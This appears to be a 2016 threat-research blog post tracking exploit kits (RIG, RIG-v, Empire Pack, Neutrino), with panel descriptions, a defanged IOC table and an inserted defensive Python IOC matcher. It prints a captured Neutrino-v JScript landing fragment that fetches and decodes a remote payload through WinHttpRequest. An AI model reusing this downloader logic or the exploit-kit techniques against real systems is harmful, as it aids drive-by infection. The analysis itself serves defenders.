2016-10-02 - Landscape
RIG evolves, Neutrino waves goodbye, Empire Pack appears
Around the middle of August many infection chains transitioned to RIG with more geo-focused bankers and less CryptXXX (CryptMic) Ransomware.
Picture 1: Select Drive-by landscape - Middle of August 2016 vs Middle of July 2016
RIG += internal TDS:
Trying to understand that move, I suspected and confirmed the presence of an internal TDS (Traffic Distribution System) inside RIG Exploit Kit [Edit 2016-10-08: it seems this functionality is limited to the Empire Pack version of RIG]. I believe this feature appeared in the EK market with Blackhole (if you are aware of a TDS integrated earlier directly in an EK, please tell me)
Picture 2: Blackhole - 2012 - Internal TDS illustration
but disappeared from the market with the end of Nuclear Pack
Picture3: Nuclear Pack - 2016-03-09 - Internal TDS illustration
and Angler EK
Picture 4: Angler EK - Internal TDS illustration
This is a key feature for load sellers: it makes their day-to-day work with traffic providers far easier.
It allows an Exploit Kit operator to attach multiple payloads to a single thread; the drop is conditioned by the Geo (and/or OS settings) of the victim.
Obviously you can achieve the same result with any other exploit kit, but things are a little more difficult: you have to create one Exploit Kit thread per payload, use an external TDS (like Keitaro/Sutra/BlackHat TDS/SimpleTDS/BossTDS, etc.) and from that TDS point the traffic to the correct Exploit Kit thread (or, if you buy traffic, tell your traffic provider where to send the traffic for each targeted country).
Picture 5: A Sutra TDS in action in 2012 - cf The path to infection
RIG += RC4 encryption, DLL drop and CVE-2016-0189:
Around 2016-09-12 a variation of RIG (which I flag as RIG-v in my systems) appeared: a slightly different landing obfuscation, RC4 encoding, Neutrino-ish behavior and the addition of CVE-2016-0189.
Picture 6: RIG-v Neutrino-ish behavioral captured by Brad Spengler’s modified cuckoo
Picture 7: CVE-2016-0189 from RIG-v after 3 step de-obfuscation pass.
Neutrino waves goodbye?
On 2016-09-09 a message on Jabber from the Neutrino seller account was reported underground: “we are closed. no new rents, no extends more”. This explains a lot. Here are some of my last Neutrino passes for the past month.
Picture 8: Some Neutrino passes for past month and associated taxonomy tags in Misp
As you can see several actors were still using it. Now here is what I get for the past days:
Picture 9: Past days in DriveBy land
Not shown here, Magnitude is still around, mostly striking in Asia
Day after day, each of them transitioned to RIG or “RIG-v”. Around the 22nd of September 2016 the Neutrino advert and banner disappeared from underground.
Picture 10: Last banner for Neutrino as of 2016-09-16
Are we witnessing the end of Neutrino Exploit Kit? To some degree. In fact it looks more like Neutrino is going into full “Private” mode, “à la” Magnitude.
Side reminder: Neutrino disappeared from March 2014 till November 2014.
A Neutrino Variant
Several weeks ago, Trendmicro (Thanks!!) made me aware of a malvertising chain they spotted in Korea and Taiwan involving Neutrino.
Picture 11: Neutrino-v pass on the 2016-09-21
Upon replay I noticed that this Neutrino was somewhat different: smoother CVE-2016-4117, more randomization in the landing, and a slightly modified flash bundle of exploits.
Picture 12: Neutrino-v flash run through Maciej's Neutrino decoder
Note the pnw26 entry with no associated binary data, the rubbish and additionalInfo.
A sample: 607f6c3795f6e0dedaa93a2df73e7e1192dcc7d73992cff337b895da3cba5523
Picture 13: Neutrino-v behavioral is a little different: drop names are not generated via the GetTempName API
```javascript
// Neutrino-v landing snippet as captured; obfuscated names (a, e, n, k, Rf) are
// defined elsewhere in the landing and are kept as-is. Given the "Request.5.1"
// suffix, the concatenated ProgID is presumably "WinHttp.WinHttpRequest.5.1".
function k2(k) {
    var y = a(e + "." + e + "Request.5.1"); // presumably instantiates the WinHttpRequest COM object
    y.setProxy(n);                          // per the text: make WinHTTP use the default (pre-configured) proxy
    y.open("GET", k(1), n);                 // target URL comes from the argument array
    y.Option(n) = k(2);                     // JScript syntax for setting an indexed WinHttpRequest option
    y.send();
    if (200 == y.status) return Rf(y.responseText, k(n)) // decode the response with key k(n)
};
```
Neutrino-v ensuring WScript will use the default proxy (most often, when a proxy is configured it is only for WinINet; the WinHTTP proxy is not set, so WScript would try to connect directly and fail). I believe this Neutrino variant is in action in only one infection chain (if you think this is inaccurate, I'd love to hear about it).
Picture 14: Neutrino-v seems to be used by only one actor to spread Cerber 0079x
The actor behind this chain is the same as the one featured in the Malwarebytes Neutrino EK: more Flash trickery post.
Empire Pack:
Coincidentally a new Exploit Kit is being talked about underground: Empire Pack. Private, not advertised.
Picture 15: King of Loads - Empire Pack Panel
Some might find this interface quite familiar. A look at the favicon will give you a hint.
Picture 16: RIG EK favicon on Empire Pack panel
Picture 17: RIG Panel
It seems the Empire Pack project was conceived upon Angler EK's disappearance and launched around the 14th of August 2016.
[Speculation]
I think this launch could be related to the first wave of switch to RIG that occurred around that time. I think Empire Pack is a RIG instance managed by a Reseller/Load Seller with strong underground connections. RIG-v is a “vip” version of RIG. Now how exactly those three elements (RIG, RIG-v, Empire Pack) are overlapping,
[/Speculation]
- api.php : historical RIG
- api3.php : RIG with internal TDS [2016-10-08: this is Empire Pack. It also appears to be using remote_api since this post went live. I flag it as RIG-E]
- remote_api.php : RIG-v
By the way, RIG has also (as Nuclear and Angler ended up doing) added IP whitelisting on API calls to avoid easy EK tracking from there (only whitelisted IPs - from the declared redirector or external TDS - can query the API to get the current landing).
Conclusion
Let’s just conclude this post with the statistics pages of two Neutrino threads.
Picture 18: Neutrino stats - Aus focused thread - 2016-07-15
Picture 19: Neutrino stats on 1 Million traffic - 2016-06-09
“We will be known forever by the tracks we leave”
Santee Sioux Tribe
Some IOCs
Date | Domain | IP | Comment |
---|---|---|---|
2016-10-01 | szsiul.bluekill[.]top | 137.74.55.6 | Neutrino-v |
2016-10-01 | twqivrisa.pinkargue[.]top | 137.74.55.7 | Neutrino-v |
2016-10-01 | u0e1.wzpub4q7q[.]top | 185.117.73.80 | RIG-E (Empire Pack) |
2016-10-01 | adspixel[.]site | 45.63.100.224 | NeutrAds Redirector |
2016-09-30 | re.flighteducationfinancecompany[.]com | 109.234.37.218 | RIG-v |
2016-09-28 | add.alislameyah[.]org | 193.124.117.13 | RIG-v |
2016-09-28 | lovesdeals[.]ml | 198.199.124.116 | RIG-v |
2016-09-27 | dns.helicopterdog[.]com | 195.133.201.23 | RIG |
2016-09-26 | sv.flickscoop[.]net | 195.133.201.41 | RIG |
2016-09-26 | red.truewestcarpetcare[.]com | 195.133.201.11 | RIG-v |
2016-09-26 | oitutn.yellowcarry[.]top | 78.46.167.130 | Neutrino |
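As an added example (not from the post): a small Python helper that parses the IOC table above in its published, defanged form, refangs the domains and runs them over a few constructed proxy log lines, matching on host (including subdomains of a listed domain) and on destination IP. The log format and the log lines are assumptions made here; the indicators are a subset of the table.

```python
import re
from dataclasses import dataclass

# Constructed subset of the IOC table from this post, copied in its published
# (defanged, "[.]") form so it can be pasted straight from the page.
IOC_TABLE = """\
Date | Domain | IP | Comment |
---|---|---|---|
2016-10-01 | szsiul.bluekill[.]top | 137.74.55.6 | Neutrino-v |
2016-10-01 | u0e1.wzpub4q7q[.]top | 185.117.73.80 | RIG-E (Empire Pack) |
2016-09-30 | re.flighteducationfinancecompany[.]com | 109.234.37.218 | RIG-v |
2016-09-27 | dns.helicopterdog[.]com | 195.133.201.23 | RIG |
2016-09-26 | oitutn.yellowcarry[.]top | 78.46.167.130 | Neutrino |
"""

# Constructed proxy log lines (assumed format: timestamp client method url dst_ip).
SAMPLE_LOG = """\
1475308800.123 10.0.0.5 GET http://szsiul.bluekill.top/?q=1 137.74.55.6
1475308801.456 10.0.0.7 GET http://www.example.com/ 93.184.216.34
1475308802.789 10.0.0.9 GET http://cdn.helicopterdog.com/a 195.133.201.23
1475308803.001 10.0.0.9 GET http://sub.re.flighteducationfinancecompany.com/x 1.2.3.4
"""

DATE_RE = re.compile(r"\d{4}-\d{2}-\d{2}$")
IPV4_RE = re.compile(r"(\d{1,3}\.){3}\d{1,3}$")


@dataclass(frozen=True)
class Ioc:
    date: str
    domain: str   # refanged, lower-case
    ip: str
    comment: str  # the post's family label (RIG, RIG-v, Neutrino-v, ...)


def refang(domain):
    """Turn the published 'example[.]top' form back into a matchable hostname."""
    return domain.replace("[.]", ".").strip().lower()


def parse_ioc_table(text):
    """Parse the markdown-style table; header and separator rows are skipped."""
    iocs = []
    for line in text.splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) < 4 or not DATE_RE.match(cells[0]) or not IPV4_RE.match(cells[2]):
            continue
        iocs.append(Ioc(cells[0], refang(cells[1]), cells[2], cells[3]))
    return iocs


def host_of(url):
    """Extract the host part of a URL (scheme, path and port stripped, lower-cased)."""
    return re.sub(r"^[a-z]+://", "", url.lower()).split("/")[0].split(":")[0]


def domain_matches(host, ioc_domain):
    """Exact match or a subdomain of the indicator (sub.example.top hits example.top)."""
    return host == ioc_domain or host.endswith("." + ioc_domain)


def match_log(log_text, iocs):
    """Return one hit per log line whose host or destination IP is in the IOC list."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue
        _ts, client, _method, url, dst_ip = parts[:5]
        host = host_of(url)
        for ioc in iocs:
            on_domain = domain_matches(host, ioc.domain)
            on_ip = dst_ip == ioc.ip
            if on_domain or on_ip:
                reason = "both" if on_domain and on_ip else ("domain" if on_domain else "ip")
                hits.append({"client": client, "host": host, "dst_ip": dst_ip,
                             "ioc": ioc, "matched_on": reason})
                break  # one hit per line is enough for triage
    return hits


if __name__ == "__main__":
    for h in match_log(SAMPLE_LOG, parse_ioc_table(IOC_TABLE)):
        print(f"{h['client']} -> {h['host']} ({h['dst_ip']}): {h['ioc'].comment} via {h['matched_on']}")
```

The IP-only match on the third log line is deliberate: the exploit kit hostnames in the table rotate quickly, while the hosting IPs (see the 195.133.201.x entries) are reused across several of them, so a hit on IP alone is worth a look even when the hostname is new.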
Acknowledgements
Thanks Malc0de, Joseph C Chen (Trendmicro), Will Metcalf (EmergingThreat/Proofpoint) for their inputs and help on multiple aspects of this post.
Edits
2016-10-03 :
Removed limitation to KOR and TWN for Neutrino-v use by NeutrAds as Trendmicro informed me they are now seeing them in other Geos.
Added explanation about the IP whitelisting on RIG API (it was not clear)
2016-10-08 :
Updated with gained information on Empire Pack
2016-11-01 :
RIG standard is now also using the pattern introduced in the past week by RIG-v. It's now in version 4.
https://twitter.com/kafeine/status/790482708870864896
RIG panel
2016-11-18 : Empire (RIG-E) is now using RC4 encoding as well (still on old pattern and landing).
RIG-E Behavioral
RIG-v has increased filtering on IP ranges and added a pre-landing to filter out non-IE traffic.
2016-12-03 - RIG-v Pre-landing
Read More
RIG’s Facelift - 2016-09-30 - SpiderLabs
Is it the End of Angler ? - 2016-06-11
Neutrino : The come back ! (or Job314 the Alter EK) - 2014-11-01
Hello Neutrino ! - 2013-06-07
The path to infection - Eye glance at the first line of “Russian Underground” - 2012-12-05